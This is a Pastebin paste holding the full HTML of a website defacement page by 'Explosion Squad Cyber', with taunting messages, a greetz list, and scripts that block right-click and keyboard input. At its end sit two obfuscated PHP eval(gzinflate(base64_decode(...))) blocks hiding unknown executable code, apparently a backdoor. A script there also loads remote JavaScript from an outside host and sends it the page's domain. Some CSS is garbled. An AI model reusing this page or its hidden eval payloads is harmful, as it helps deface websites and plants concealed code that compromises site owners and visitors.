MR_OZO

new sc me

Feb 5th, 2019
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.08 KB | None | 0 0
  1. <!DOCTYPE html><html> <head> <title>Explosion Squad Cyber</title>
  2. <meta content="HACKED BY./KamarM4yaT404" name="description"/><meta content="Hacked By Explosion Squad Cyber" name="keywords"/><meta content="./KamarM4yaT404" name="Abstract"/><meta name="Hacked BY ./KamarM4yaT404"/><meta property="og:image" content="https://scontent-sin2-2.xx.fbcdn.net/v/t1.0-9/44837871_2190337407914965_6610682450752307200_n.jpg?_nc_cat=111&_nc_ht=scontent-sin2-2.xx&oh=a761a7d928b1633721c8923be0422810&oe=5CB3BDBB"/>
  3. <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" />
  4. <link rel="SHORTCUT ICON" href="https://i68.tinypic.com/65si9x.jpg" type="image/x-icon"/>
  5. <link href='https://fonts.googleapis.com/css?family=Nosifer' rel='stylesheet' type='text/css'>
  6. <link href='https://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  7. <link href="https://fonts.googleapis.com/css?family=Sarpanch:700" rel="stylesheet">
  8. <link href="https://fonts.googleapis.com/css?family=play" rel="stylesheet">
  9. <link rel="stylesheet" type="text/css" href="https://csshake.surge.sh/csshake.min.css">
  10. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
  11. <style class="cp-pen-styles">* {
  12. margin: 0;
  13. padding: 0;
  14. }
  15.  
  16. body{
  17. background-color: #000;
  18. }
  19.  
  20. header {
  21. background-color:rgba(33, 33, 33, 0.9);
  22. color:#ffffff;
  23. display:block;
  24. font: 14px/1.3 Arial,sans-serif;
  25. height:50px;
  26. position:relative;
  27. z-index:5;
  28. }
  29. h1{
  30. margin-top: 30px;
  31. text-align: center;
  32. color: white;
  33. font-family: Nosifer;
  34. text-shadow: 0 0 0.5em red, 0 0 0.5em red;
  35. }
  36.  
  37. .we-are {
  38. color: red;
  39. font-size: 20px;
  40. text-shadow: #000 2px 2px 2px;
  41. letter-spacing: 2px;
  42. }
  43.  
  44. .message {
  45. color: white;
  46. -webkit-animation: fadeIn 1s ease-in;
  47. animation: fadeIn 1s ease-in;
  48. }
  49.  
  50. .cn {
  51. color: white;
  52. font-size: 14px;
  53. text-shadow: #000 2px 2px 2px;
  54. letter-spacing: 2px;
  55. -webkit-animation: fadeIn 3s ease-in;
  56. animation: fadeIn 1s ease-in;
  57. }
  58.  
  59. -webkit-@keyframes we-are {
  60. from {scale: 1.1;}
  61. to {scale: 0;}
  62. }
  63.  
  64. @keyframes we-are {
  65. from {scale: 1.1;}
  66. to {scale: 0;}
  67. }
  68.  
  69. -webkit-@keyframes fadeIn {
  70. 0% {opacity: 0;}
  71. 100% {opacity: 1;}
  72. }
  73.  
  74. @keyframes fadeIn {
  75. 0% {opacity: 0;}
  76. 100% {opacity: 1;}
  77. }
  78.  
  79. @keyframes move-twink-back {
  80. from {background-position:0 0;}
  81. to {background-position:-10000px 5000px;}
  82. }
  83. @-webkit-keyframes move-twink-back {
  84. from {background-position:0 0;}
  85. to {background-position:-10000px 5000px;}
  86. }
  87. @-moz-keyframes move-twink-back {
  88. from {background-position:0 0;}
  89. to {background-position:-10000px 5000px;}
  90. }
  91. @-ms-keyframes move-twink-back {
  92. from {background-position:0 0;}
  93. to {background-position:-10000px 5000px;}
  94. }
  95.  
  96. @keyframes move-clouds-back {
  97. from {background-position:0 0;}
  98. to {background-position:10000px 0;}
  99. }
  100. @-webkit-keyframes move-clouds-back {
  101. from {background-position:0 0;}
  102. to {background-position:10000px 0;}
  103. }
  104. @-moz-keyframes move-clouds-back {
  105. from {background-position:0 0;}
  106. to {background-position:10000px 0;}
  107. }
  108. @-ms-keyframes move-clouds-back {
  109. from {background-position: 0;}
  110. to {background-position:10000px 0;}
  111. }
  112.  
  113. .stars, .twinkling, .clouds {
  114. position:absolute;
  115. top:0;
  116. left:0;
  117. right:0;
  118. bottom:0;
  119. width:100%;
  120. height:100%;
  121. display:block;
  122. }
  123.  
  124. .stars {
  125. background:#000 url(http://www.script-tutorials.com/demos/360/images/stars.png) repeat top center;
  126. z-index:0;
  127. }
  128.  
  129. .twinkling{
  130. background:transparent url(http://www.script-tutorials.com/demos/360/images/twinkling.png) repeat top center;
  131. z-index:1;
  132.  
  133. -moz-animation:move-twink-back 200s linear infinite;
  134. -ms-animation:move-twink-back 200s linear infinite;
  135. -o-animation:move-twink-back 200s linear infinite;
  136. -webkit-animation:move-twink-back 200s linear infinite;
  137. animation:move-twink-back 200s linear infinite;
  138. }
  139.  
  140. .clouds{
  141. background:transparent url(http://www.script-tutorials.com/demos/360/images/clouds3.png) repeat top center;
  142. background-repeat: no-repeat;
  143. z-index:3;
  144.  
  145. -moz-animation:move-clouds-back 200s linear infinite;
  146. -ms-animation:move-clouds-back 200s linear infinite;
  147. -o-animation:move-clouds-back 200s linear infinite;
  148. -webkit-animation:move-clouds-back 200s linear infinite;
  149. animation:move-clouds-back 200s linear infinite;
  150. }
  151.  
  152. .container {
  153. height: 100%;
  154. width: 100%;
  155. justify-content: center;
  156. align-items: center;
  157. display: flex;
  158. }
  159. .text {
  160. font-weight: 100;
  161. font-size: 28px;
  162. color: #FAFAFA;
  163. font-family: Iceland;
  164. text-shadow: 0 0 0.5em cyan, 0 0 0.5em cyan;
  165.  
  166. }
  167. .dud {
  168. color: #757575;
  169. }
  170.  
  171. .animation-container {
  172. position: fixed;
  173. top: 0;
  174. left: 0;
  175. right: 0;
  176. bottom: 0;
  177. z-index: 1;
  178. }
  179.  
  180. .animation-container span {
  181. color: whitesmoke;
  182. display: block;
  183. font-size: 18px;
  184. font-family: 'Helvetica';
  185. text-shadow: 0 0 1px white;
  186. position: absolute;
  187. user-select: none;
  188. pointer-events: none;
  189. cursor: default;
  190. z-index: 1;
  191. opacity: 0;
  192. will-change: transform, opacity;
  193. animation-timing-function: ease-out;
  194. animation-name: move;
  195. }
  196.  
  197. @keyframes move {
  198. 0% {
  199. opacity: 0;
  200. transform: translateY(100vh);
  201. }
  202. 25% {
  203. opacity: 1;
  204. }
  205. 50% {
  206. opacity: 1;
  207. }
  208. 75% {
  209. opacity: 0;
  210. }
  211. 100% {
  212. opacity: 0;
  213. transform: none;
  214. }
  215. }
  216. .buzz_wrapper{
  217. position:relative;
  218. width:100%;
  219. margin:180px auto;
  220. background-attachment: fixed;
  221. background-image: url(http://i.imgur.com/9QpJPlG.jpg);
  222. background-position: 0 0;
  223. background-repeat: no-repeat ;
  224. background-size:cover;
  225. overflow : hidden;
  226. overflow:hidden;
  227. padding:100px;
  228. }
  229. .scanline{
  230. width:100%;
  231. display:block;
  232. background:#000;
  233. height:4px;
  234. position:relative;
  235. z-index:3;
  236. margin-bottom:5px;
  237. opacity:0.1;
  238. }
  239. .buzz_wrapper span{
  240. position:absolute;
  241. -webkit-filter: blur(1px);
  242. font-size:30px;
  243. font-family:'Courier new', fixed;
  244. font-weight:bold;
  245. }
  246. .buzz_wrapper span:nth-child(1){
  247. color:red;
  248. margin-left:-2px;
  249. -webkit-filter: blur(2px);
  250. }
  251. .buzz_wrapper span:nth-child(2){
  252. color:green;
  253. margin-left:2px;
  254. -webkit-filter: blur(2px);
  255. }
  256. .buzz_wrapper span:nth-child(3){
  257. color:blue;
  258. position:20px 0;
  259. -webkit-filter: blur(1px);
  260. }
  261. .buzz_wrapper span:nth-child(4){
  262. color:#fff;
  263. -webkit-filter: blur(1px);
  264. text-shadow:0 0 50px rgba(255,255,255,0.4);
  265. }
  266. .buzz_wrapper span:nth-child(5){
  267. color:rgba(255,255,255,0.4);
  268. -webkit-filter: blur(15px);
  269. }
  270.  
  271. .buzz_wrapper span{
  272. -webkit-animation: blur 30ms infinite, jerk 50ms infinite;
  273. }
  274.  
  275. @-webkit-keyframes blur {
  276. 0% { -webkit-filter: blur(1px); opacity:0.8;}
  277. 50% { -webkit-filter: blur(1px); opacity:1; }
  278. 100%{ -webkit-filter: blur(1px); opacity:0.8; }
  279. }
  280. @-webkit-keyframes jerk {
  281. 50% { left:1px; }
  282. 51% { left:0; }
  283. }
  284. @-webkit-keyframes jerkup {
  285. 50% { top:1px; }
  286. 51% { top:0; }
  287. }
  288.  
  289. .buzz_wrapper span:nth-child(3){
  290. -webkit-animation: jerkblue 1s infinite;
  291. }
  292. @-webkit-keyframes jerkblue {
  293. 0% { left:0; }
  294. 30% { left:0; }
  295. 31% { left:10px; }
  296. 32% { left:0; }
  297. 98% { left:0; }
  298. 100% { left:10px; }
  299. }
  300. .buzz_wrapper span:nth-child(2){
  301. -webkit-animation: jerkgreen 1s infinite;
  302. }
  303. @-webkit-keyframes jerkgreen {
  304. 0% { left:0; }
  305. 30% { left:0; }
  306. 31% { left:-10px; }
  307. 32% { left:0; }
  308. 98% { left:0; }
  309. 100% { left:-10px; }
  310. }
  311.  
  312. .buzz_wrapper .text{
  313. -webkit-animation: jerkwhole 5s infinite;
  314. position:relative;
  315. }
  316. @-webkit-keyframes jerkwhole {
  317. 30% { }e(1,1); -webkit-transform:skew(0,0);}
  318. 41% { opacity:0.8; top:0px; left:-100px; -webkit-transform:scale(1,1.2); -webkit-transform:skew(50deg,0);}
  319. 42% { opacity:0.8; top:0px; left:100px; -webkit-transform:scale(1,1.2); -webkit-transform:skew(-80deg,0);}
  320. 43% { opacity:1; top:0; left:0; -webkit-transform:scale(1,1); -webkit-transform:skew(0,0);
  321. 40% { opacity:1; top:0; left:0; -webkit-transform:scal}
  322. 65% { }
  323. }
  324. </style></head><body>
  325. <div style="position: fixed; top: 75px; left: -225px; width: 600px; padding: 10px; font-size: 24px; text-align: center; color: white; font-family: 'trebuchet ms', verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: Transparent; border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><a href="https://pastebin.com/raw/HBL5xBBA" style="text-decoration:none;color:#F1EEED;">Explosion Squad Cyber</a></div>
  326.  
  327. <br>
  328. <br>
  329.  
  330. <div class="twinkling">
  331. <center><br><br><br>
  332. <img src="https://scontent-sin2-2.xx.fbcdn.net/v/t1.0-9/44837871_2190337407914965_6610682450752307200_n.jpg?_nc_cat=111&_nc_ht=scontent-sin2-2.xx&oh=a761a7d928b1633721c8923be0422810&oe=5CB3BDBB" style="height: 300px; " /><br>
  333. <div class="container">
  334. <div class="text"></div>
  335. </div><br><br><br>
  336. <font color="#00FF00" size="4"></font><br>
  337. <br>
  338. <br><font color="#F50808"><b>Explosion Squad Cyber | </b></font><font color="#F50808"><b>Hunter Security Crew | D704T </b></font><font color="#FCFBFB"><b>| Infinity Cyber Team| </b></font><font color="#FCFBFB"> | Indonesian Code Party | </b></font><br>
  339. <br>
  340. <font color="#F60E05">
  341. <div id="Greets">
  342. <center>
  343. <span class="white">Message:-</span> <br> <marquee width="820" scrollamount="4" scrolldelay="50" style="width: 820px;"> <span style="font-size:13pt;">~ Your Website Got Hacked Sir? Need help?, just go to the police station,zhuahuaha :v ~</span> </marquee> </div>
  344. <div id="Greets">
  345. <span class="glow" style="font-size:11pt;">Greetz</span> <br> <marquee width="820" scrollamount="4" scrolldelay="50" style="width: 820px;"> <span style="font-size:13pt;">
  346. ./Br0k3n-H0m3 | ./Z3R0H3R0 | Mr.Stuart | Mr Clown | Mr.Xcyber | Mr.SW4GH4T | XssNuser404 | X404_LOSER | Mr.Plug1n | Mr./K4NC1L5 | Hadi053 | Mr.C0D3T | Mr.MythStyx | Mr. T4UHB0T | Simi Simi | Mr.Grim | Mr.Kahh |And you
  347. </center></span> </marquee> </div>
  348. </font>
  349. <br>
  350. <font face="Play">
  351. </font>
  352. <div class="clouds">
  353. </div>
  354. <br>
  355. <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/howler/2.0.3/howler.min.js"></script>
  356. <script type="text/javascript">
  357. <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/howler/2.0.3/howler.min.js"></script>
  358. <iframe width="0%" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F80970820&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></iframe>
  359.  
  360.  
  361.  
  362. <script src='//production-assets.codepen.io/assets/common/stopExecutionOnTimeout-b2a7b3fe212eaa732349046d8416e00a9dec26eb7fd347590fbced3ab38af52e.js'></script>
  363. <script >class TextScramble {
  364. constructor(el) {
  365. this.el = el
  366. this.chars = '!@#$%^&*()_-=+{}:"|<>?,./;'
  367. this.update = this.update.bind(this)
  368. }
  369. setText(newText) {
  370. const oldText = this.el.innerText
  371. const length = Math.max(oldText.length, newText.length)
  372. const promise = new Promise((resolve) => this.resolve = resolve)
  373. this.queue = []
  374. for (let i = 0; i < length; i++) {
  375. const from = oldText[i] || ''
  376. const to = newText[i] || ''
  377. const start = Math.floor(Math.random() * 40)
  378. const end = start + Math.floor(Math.random() * 40)
  379. this.queue.push({ from, to, start, end })
  380. }
  381. cancelAnimationFrame(this.frameRequest)
  382. this.frame = 0
  383. this.update()
  384. return promise
  385. }
  386. update() {
  387. let output = ''
  388. let complete = 0
  389. for (let i = 0, n = this.queue.length; i < n; i++) {
  390. let { from, to, start, end, char } = this.queue[i]
  391. if (this.frame >= end) {
  392. complete++
  393. output += to
  394. } else if (this.frame >= start) {
  395. if (!char || Math.random() < 0.28) {
  396. char = this.randomChar()
  397. this.queue[i].char = char
  398. }
  399. output += `<span class="dud">${char}</span>`
  400. } else {
  401. output += from
  402. }
  403. }
  404. this.el.innerHTML = output
  405. if (complete === this.queue.length) {
  406. this.resolve()
  407. } else {
  408. this.frameRequest = requestAnimationFrame(this.update)
  409. this.frame++
  410. }
  411. }
  412. randomChar() {
  413. return this.chars[Math.floor(Math.random() * this.chars.length)]
  414. }
  415. }
  416.  
  417. const phrases = [
  418. '|Defaced By ./KamarM4yaT404|',
  419. '|Indonesian Hacker Rulez|',
  420. 'You Lose!',
  421.  
  422.  
  423.  
  424. ]
  425.  
  426. const el = document.querySelector('.text')
  427. const fx = new TextScramble(el)
  428.  
  429. let counter = 0
  430. const next = () => {
  431. fx.setText(phrases[counter]).then(() => {
  432. setTimeout(next, 1500)
  433. })
  434. counter = (counter + 1) % phrases.length
  435. }
  436.  
  437. next()
  438.  
  439. 'use strict';
  440.  
  441. var app = {
  442.  
  443. chars: ['ESC','LOL!','Symlink!','Server Weak','Indonesian!','Stamped','HACKED!','Hahaha!','You Lose!','Idiot System!','Cyber Crime!'],
  444.  
  445. init: function () {
  446. app.container = document.createElement('div');
  447. app.container.className = 'animation-container';
  448. document.body.appendChild(app.container);
  449. window.setInterval(app.add, 100);
  450. },
  451.  
  452. add: function () {
  453. var element = document.createElement('span');
  454. app.container.appendChild(element);
  455. app.animate(element);
  456. },
  457.  
  458. animate: function (element) {
  459. var character = app.chars[Math.floor(Math.random() * app.chars.length)];
  460. var duration = Math.floor(Math.random() * 15) + 1;
  461. var offset = Math.floor(Math.random() * (50 - duration * 2)) + 3;
  462. var size = 10 + (15 - duration);
  463. element.style.cssText = 'right:'+offset+'vw; font-size:'+size+'px;animation-duration:'+duration+'s';
  464. element.innerHTML = character;
  465. window.setTimeout(app.remove, duration * 1000, element);
  466. },
  467.  
  468. remove: function (element) {
  469. element.parentNode.removeChild(element);
  470. },
  471.  
  472. };
  473.  
  474. document.addEventListener('DOMContentLoaded', app.init);
  475. //# sourceURL=pen.js
  476. </script>
  477. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdXZ4eMt2wDRLuD1wAvAb%2fBm8j0MghSel0IK5%2fE0TT0EJXQRuk1APYP0giPjGUgWf9J5ajXFs3iSNvUmvohEtM5DlrMKOZl%2fGqiJ5iqMhuYHQ9Q34udtK20E0U61BUkp7yTJMTOuDb%2bD0zE9HS%2fHP5zB56lXp39uqJqPs8FRoA8xjWrXUOf00mJwQ4VYMPDGguXKGpl7zvyxfyDlGxfXizC9aWlN5hHyaLpkej2pAq%2bXN467UcaT8qcNGNpnHP7Np0inV8GavfAsXJkt3lYj5XDdsGweePmkMjU9W6nGXwY3fbcXWFOHwZy5tWQw0qDmCiAa88Qv6rzBHIEAd9BufSaeglExjJr0ZBPApjmhhToS%2b95JPntbL3A3ZHoLAe7EHmQ7zuRmej%2be0MQCOYvltbCcWuD6gHup64oP56PpSifHRfQP60IiStq80vS%2bR87PREiPSZ4D7UX67%2fQCSPdRRPrl9j%2fy5TCVDC4bUvqdtSoO1%2bZpX7o%2fFZiF0fBRDUDpptNl2mnzchVffeYhfpUueAzhkAdJC1iWA4OLUaeGU0hi23DtRYCX4cZI2Zjp8Bj5rPMrzqfNYzYOwFth1GiB647kUTnZCuK2GC" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
  478. <?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?></body></html>
Add Comment
Please, Sign In to add comment